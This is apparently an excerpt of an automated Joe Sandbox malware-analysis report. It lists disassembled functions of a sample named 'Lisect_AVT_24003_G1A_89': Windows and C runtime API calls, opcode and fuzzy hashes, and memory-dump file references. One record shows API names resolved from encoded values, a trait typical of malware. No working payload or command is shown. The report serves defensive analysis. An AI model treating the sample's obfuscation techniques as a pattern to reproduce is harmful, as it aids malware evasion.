                                  • Opcode Fuzzy Hash: 898e4d5caacfcc800a95fb9a43e2e308bc55c5968f9de80e292ca88134c41fc3
                                  • Instruction Fuzzy Hash: 7841C534A0020AABDF10DF6DC894AEEBFE9AF45324F148095F9989B255D735EA01DB90
                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,010A4C96,00FB2D8D,?,00000000,?,?,?,010A4EC0,00000022,FlsSetValue,010C0AD8,010C0AE0,?), ref: 010A4C48
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 3664257935-537541572
                                  • Opcode ID: b64eaf34cba0462c6f7799d5416a637315cdd8c9da0f92425705bf5fdeaebc74
                                  • Instruction ID: 55da2fc3b22e5598a381cea61cedf222a1e1d8912350c6840593c37f703b5d00
                                  • Opcode Fuzzy Hash: b64eaf34cba0462c6f7799d5416a637315cdd8c9da0f92425705bf5fdeaebc74
                                  • Instruction Fuzzy Hash: F8216079500119ABD7719BA9ED50BDB37E8DB01760F590250F9DAEB285D7B0ED00C7D0
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,?,010D04B8,07FFFFFF,?,bad locale name), ref: 0108C7BA
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,?,010D04B8,07FFFFFF,?,bad locale name), ref: 0108C825
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,010D04B8,07FFFFFF,?,bad locale name), ref: 0108C842
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,010D04B8,07FFFFFF,?,bad locale name), ref: 0108C881
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,010D04B8,07FFFFFF,?,bad locale name), ref: 0108C8E0
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,?,010D04B8,07FFFFFF,?,bad locale name), ref: 0108C903
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiStringWide
                                  • String ID:
                                  • API String ID: 2829165498-0
                                  • Opcode ID: b4ab53482a2f1b07d1007e404eb18c516220d5578d84375ec9c3b98e640ca8b8
                                  • Instruction ID: 3e600e3a5952c0efdfc3aa6e7201dc6146bea8cd96be3220b69bbb711375cbf9
                                  • Opcode Fuzzy Hash: b4ab53482a2f1b07d1007e404eb18c516220d5578d84375ec9c3b98e640ca8b8
                                  • Instruction Fuzzy Hash: 9C51BE7291420ABBFF20AFA4CD44FEA7FB9EF44750F1445A9FAD4A6190E73589108B70
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 01019543
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 01019566
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 01019586
                                  • std::_Facet_Register.LIBCPMT ref: 010195FB
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 01019613
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0101962B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                  • String ID:
                                  • API String ID: 2081738530-0
                                  • Opcode ID: deade354f6afa716a4a4596424888e2c3c2a9106c8582500c8d2c7cd846d32c2
                                  • Instruction ID: 3740db7322913919fe7a9297e55de8135f48e8ce5ad2786bea970593d1f6b98d
                                  • Opcode Fuzzy Hash: deade354f6afa716a4a4596424888e2c3c2a9106c8582500c8d2c7cd846d32c2
                                  • Instruction Fuzzy Hash: F441FF71900219DFCB21EF58D850AAEBBB4FF04728F144698E9C56B385D735EA00CBE0
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C66D7777,?,?,00000000,010BACB1,000000FF,?,0109CBBF,?,?,0109CB93,00000016), ref: 0109CC18
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0109CC2A
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,010BACB1,000000FF,?,0109CBBF,?,?,0109CB93,00000016), ref: 0109CC4C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: a1eab34b214e3c4df435c6bb06ac66303f72db8ce6029a5dbef0e534bd5efc0d
                                  • Instruction ID: 7bdaa97b48e56d87fc757231796ba8abea3ec78a926d18e9cb08d2bc17a7be87
                                  • Opcode Fuzzy Hash: a1eab34b214e3c4df435c6bb06ac66303f72db8ce6029a5dbef0e534bd5efc0d
                                  • Instruction Fuzzy Hash: 79012B71940659EFEB118F48DD45BEE7FF8FB04B11F004529F851A3280DB799900CB90
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00FB60F2
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00FB617F
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00FB6248
                                  Strings
                                  • recursive_directory_iterator::operator++, xrefs: 00FB61CC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy$___std_exception_copy
                                  • String ID: recursive_directory_iterator::operator++
                                  • API String ID: 1206660477-953255998
                                  • Opcode ID: 14eded39c91c4a3deff3bef98fad6a101dc8bcdedfc20b3144c45f27eb497eee
                                  • Instruction ID: 24c8adb416ac7c1adb34e842d0080c12096e2566fcebc9f68c8c12a3b8810abd
                                  • Opcode Fuzzy Hash: 14eded39c91c4a3deff3bef98fad6a101dc8bcdedfc20b3144c45f27eb497eee
                                  • Instruction Fuzzy Hash: F0E1F2B19006059FDB28EF69C884BEEF7F9FF54700F10461DE49697680D778AA44CBA1
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00FB86DE
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00FB86ED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: at line $, column
                                  • API String ID: 4194217158-191570568
                                  • Opcode ID: 39941d8bfd49032ced663bca33914be88bcab72f69a9aaa5d5a5c05b28566da9
                                  • Instruction ID: 56a0a4ddb285b867558992a87489955d1f478f942c2bbdf967e3ad5a9e72b478
                                  • Opcode Fuzzy Hash: 39941d8bfd49032ced663bca33914be88bcab72f69a9aaa5d5a5c05b28566da9
                                  • Instruction Fuzzy Hash: 8F614971D002059FDB08DF68CC857DEBBB6FF84310F144218E455AB781EB74AA85DB91
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 01023946
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 0102395F
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 01023A97
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 01023AB0
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 01023C16
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 01023C2F
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 01024479
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 01024492
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: value
                                  • API String ID: 4194217158-494360628
                                  • Opcode ID: 7b6b666052c3d9f3496be3f06cdaf6cc3e4bd5ec24250430c2a3945ed8996329
                                  • Instruction ID: ba2fa289ac37a383c161566bea4f11ee337cc22d214a07a72977f0714f5baddd
                                  • Opcode Fuzzy Hash: 7b6b666052c3d9f3496be3f06cdaf6cc3e4bd5ec24250430c2a3945ed8996329
                                  • Instruction Fuzzy Hash: 5351E370C00258DBDF14DFA4CD84BDEBBB4BF15304F144259E499AB782DB796A88CB61
                                  APIs
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00FB3C0F
                                    • Part of subcall function 0108E96B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,0108B17A,?,010E09CC,00000000,?,00000000,-010E65B0), ref: 0108E9CB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionRaise___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 3109751735-1866435925
                                  • Opcode ID: 8990f5a09a6e8c270ccda399b7bbdb55a68d7444d87b41005d011b1ab967d8bf
                                  • Instruction ID: b345a1d92cfceb384c5f4a60724b3c5d2245ff276b6f7044802ede9949fe743d
                                  • Opcode Fuzzy Hash: 8990f5a09a6e8c270ccda399b7bbdb55a68d7444d87b41005d011b1ab967d8bf
                                  • Instruction Fuzzy Hash: C111D2B29007096BC710EE5AD841BDAB7E8EF54320F54862AFD989B244FB74E944CF91
                                  APIs
                                  • GetConsoleOutputCP.KERNEL32(C66D7777,00000000,00000000,?), ref: 010A2685
                                    • Part of subcall function 010A8463: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,010A406B,?,00000000,-00000008), ref: 010A84C4
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 010A28D7
                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 010A291D
                                  • GetLastError.KERNEL32 ref: 010A29C0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                  • String ID:
                                  • API String ID: 2112829910-0
                                  • Opcode ID: c159a6606cfc049dedde4d99190b9ad700bb33f2eb07fd149fce49f9b57b328b
                                  • Instruction ID: c68166ec3964a4d6d2b99a594a64f9455d2537e9d02fca41e806b88461ef997e
                                  • Opcode Fuzzy Hash: c159a6606cfc049dedde4d99190b9ad700bb33f2eb07fd149fce49f9b57b328b
                                  • Instruction Fuzzy Hash: 48D188B5D002499FCB15CFE8C8809EDBBF4FF09314F58456AE9A6EB351D630A942CB60
                                  APIs
                                  • GetModuleHandleA.KERNEL32(B6BDACB9), ref: 00FBA619
                                  • GetProcAddress.KERNEL32(00000000,AF88AC99), ref: 00FBA624
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 00FBA6A2
                                  • SetEvent.KERNEL32(00000000), ref: 00FBA6A9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Event$AddressCreateHandleModuleProc
                                  • String ID:
                                  • API String ID: 2341598627-0
                                  • Opcode ID: b2691d9194626f7d2ff2c39107f1b10cae4779f9b92fd03eef493a0ea7be4452
                                  • Instruction ID: 443980afb3e54bce3f5219320f77f27a280a935ae4ed6b2edf3ce34de9359634
                                  • Opcode Fuzzy Hash: b2691d9194626f7d2ff2c39107f1b10cae4779f9b92fd03eef493a0ea7be4452
                                  • Instruction Fuzzy Hash: 8E31D47091438CEBEF10DFE4D849BEEBBB9EF15304F14005DE541AA241E7B65608CBA6
                                  APIs
                                  • WideCharToMultiByte.KERNEL32(?,00000400,?,?,?,?,00000000,00000000,?,?,?,0101979F,00000000,?,?,00000000), ref: 0108B322
                                  • GetLastError.KERNEL32(?,0101979F,00000000,?,?,00000000,00000000,?,?), ref: 0108B32E
                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000,?,0101979F,00000000,?,?,00000000,00000000,?), ref: 0108B354
                                  • GetLastError.KERNEL32(?,0101979F,00000000,?,?,00000000,00000000,?,?), ref: 0108B360
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 203985260-0
                                  • Opcode ID: ba5957ebe6b13e08a48a08f3a7f802e31283836cfa99dffdf727b90c1bea8812
                                  • Instruction ID: 6806204c8c2c288155df6b387b3634dc45d8a4e9b3122f902bb9468093d1841c
                                  • Opcode Fuzzy Hash: ba5957ebe6b13e08a48a08f3a7f802e31283836cfa99dffdf727b90c1bea8812
                                  • Instruction Fuzzy Hash: EF013132604159BBDF231E95DD48D9F3FAAFBDA790B008014FE8595225C632C822EBA0
                                  APIs
                                  • WriteConsoleW.KERNEL32(00000000,00000000,01096AF7,00000000,00000000,?,010AE99F,00000000,00000001,?,?,?,010A2A14,?,00000000,00000000), ref: 010B1C39
                                  • GetLastError.KERNEL32(?,010AE99F,00000000,00000001,?,?,?,010A2A14,?,00000000,00000000,?,?,?,010A2FEE,00000000), ref: 010B1C45
                                    • Part of subcall function 010B1C0B: CloseHandle.KERNEL32(FFFFFFFE,010B1C55,?,010AE99F,00000000,00000001,?,?,?,010A2A14,?,00000000,00000000,?,?), ref: 010B1C1B
                                  • ___initconout.LIBCMT ref: 010B1C55
                                    • Part of subcall function 010B1BCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,010B1BFC,010AE98C,?,?,010A2A14,?,00000000,00000000,?), ref: 010B1BE0
                                  • WriteConsoleW.KERNEL32(00000000,00000000,01096AF7,00000000,?,010AE99F,00000000,00000001,?,?,?,010A2A14,?,00000000,00000000,?), ref: 010B1C6A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
